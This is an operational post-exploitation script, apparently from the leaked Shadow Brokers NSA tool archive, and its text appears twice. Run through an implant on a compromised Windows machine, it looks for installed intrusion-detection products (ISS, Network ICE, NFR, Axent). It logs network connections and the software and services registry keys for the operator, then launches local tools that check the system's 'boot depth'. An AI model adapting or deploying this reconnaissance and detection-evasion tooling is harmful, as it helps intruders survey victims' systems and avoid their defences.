shadowbrokers-exploits/windows/Resources/Ep/Scripts/idslogger.eps

#--------------------------------------------------------
# File: idslogger.eps 
#
#  Start State:	
#  End State:
#  Errors:	
#  Comments:	
#
# Modifications:
#  01/06/03 Created
#  04/28/03 Edited to restrict data dragged back
#  04/28/03 edited to take out things that are done in simple.eps
#  05/08/03 changed comments to be more friendly
#--------------------------------------------------------
@echo off;
@record on;
string $ScriptsDir;
if(`getdirectory -scripts`) {
  string $Dir = GetCmdData("dir");
	$ScriptsDir = $Dir[0];
}else{
	$ScriptsDir="E:/resources/ep/scripts";
}
@record off;
@echo on;

bool $success = true;
@echo off;
echo "Starting dir list:";if(`log dir -path "\\Program Files\\ISS" -max 0 -recursive`)
{
} else if(`log dir -path "\\Program Files\\Network ICE" -max 0 -recursive`)
{
} else if(`log dir -path "\\Program Files\\NFR" -max 0 -recursive`)
{
} else if(`log dir -path "\\Program Files\\Axent" -max 0 -recursive`)
{
} else {
	echo "    Found no standard IDS directories";
}

## This chunk of code drags back too much data

##echo "Starting tree list:";
#if (`log tree -path * -max 0`) 
#{#	echo "    LOGGING";
#} else {
#	echo "    FAILED";
#	$success = false;
#}

echo "Starting port list:";
if (`log netstat`) {
    echo "    Examining netstat";
} else {
    echo "    FAILED";
    $success = false;
}

echo "getting registry (software):";
if(`log regquery -hive L -subkey software`) {
	echo "    Examining software in registry";
} else {
	echo "     FAILED";
	$success = false;
}

echo "getting registry (controlset/services):";
if(`log regquery -hive L -subkey system\\currentcontrolset\\services`) {
	echo "    Examining services in registry";
} else {
	echo "     FAILED";
	$success = false;
}

@echo on;

if ($success == false) {
   echo "Unable to log some information";
   pause;
} else {
   echo "All information has been logged";
  if (`local run -command "perl $ScriptsDir\\..\\..\\..\\tools\\bootdepth\\bootdepth.pl -x $ScriptsDir\\..\\..\\..\\tools\\bootdepth -d ." -redirect bootdepth`) {
	  if (`local run -command "perl $ScriptsDir\\..\\..\\..\\tools\\make_bootdepthcheck.pl" -redirect make_bootdepthcheck`) {
		`script check_bootdepth.eps`;
	  }
  }
}


return $success;
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 04:45:07 -05:00			`#--------------------------------------------------------`
			`# File: idslogger.eps`
			`#`
			`# Start State:`
			`# End State:`
			`# Errors:`
			`# Comments:`
			`#`
			`# Modifications:`
			`# 01/06/03 Created`
			`# 04/28/03 Edited to restrict data dragged back`
			`# 04/28/03 edited to take out things that are done in simple.eps`
			`# 05/08/03 changed comments to be more friendly`
			`#--------------------------------------------------------`
			`@echo off;`
			`@record on;`
			`string $ScriptsDir;`
			if(`getdirectory -scripts`) {
			`string $Dir = GetCmdData("dir");`
			`$ScriptsDir = $Dir[0];`
			`}else{`
			`$ScriptsDir="E:/resources/ep/scripts";`
			`}`
			`@record off;`
			`@echo on;`

			`bool $success = true;`
			`@echo off;`
			echo "Starting dir list:";if(`log dir -path "\\Program Files\\ISS" -max 0 -recursive`)
			`{`
			} else if(`log dir -path "\\Program Files\\Network ICE" -max 0 -recursive`)
			`{`
			} else if(`log dir -path "\\Program Files\\NFR" -max 0 -recursive`)
			`{`
			} else if(`log dir -path "\\Program Files\\Axent" -max 0 -recursive`)
			`{`
			`} else {`
			`echo " Found no standard IDS directories";`
			`}`

			`## This chunk of code drags back too much data`

			`##echo "Starting tree list:";`
			#if (`log tree -path * -max 0`)
			`#{# echo " LOGGING";`
			`#} else {`
			`# echo " FAILED";`
			`# $success = false;`
			`#}`

			`echo "Starting port list:";`
			if (`log netstat`) {
			`echo " Examining netstat";`
			`} else {`
			`echo " FAILED";`
			`$success = false;`
			`}`

			`echo "getting registry (software):";`
			if(`log regquery -hive L -subkey software`) {
			`echo " Examining software in registry";`
			`} else {`
			`echo " FAILED";`
			`$success = false;`
			`}`

			`echo "getting registry (controlset/services):";`
			if(`log regquery -hive L -subkey system\\currentcontrolset\\services`) {
			`echo " Examining services in registry";`
			`} else {`
			`echo " FAILED";`
			`$success = false;`
			`}`

			`@echo on;`

			`if ($success == false) {`
			`echo "Unable to log some information";`
			`pause;`
			`} else {`
			`echo "All information has been logged";`
			if (`local run -command "perl $ScriptsDir\\..\\..\\..\\tools\\bootdepth\\bootdepth.pl -x $ScriptsDir\\..\\..\\..\\tools\\bootdepth -d ." -redirect bootdepth`) {
			if (`local run -command "perl $ScriptsDir\\..\\..\\..\\tools\\make_bootdepthcheck.pl" -redirect make_bootdepthcheck`) {
			`script check_bootdepth.eps`;
			`}`
			`}`
			`}`



			`return $success;`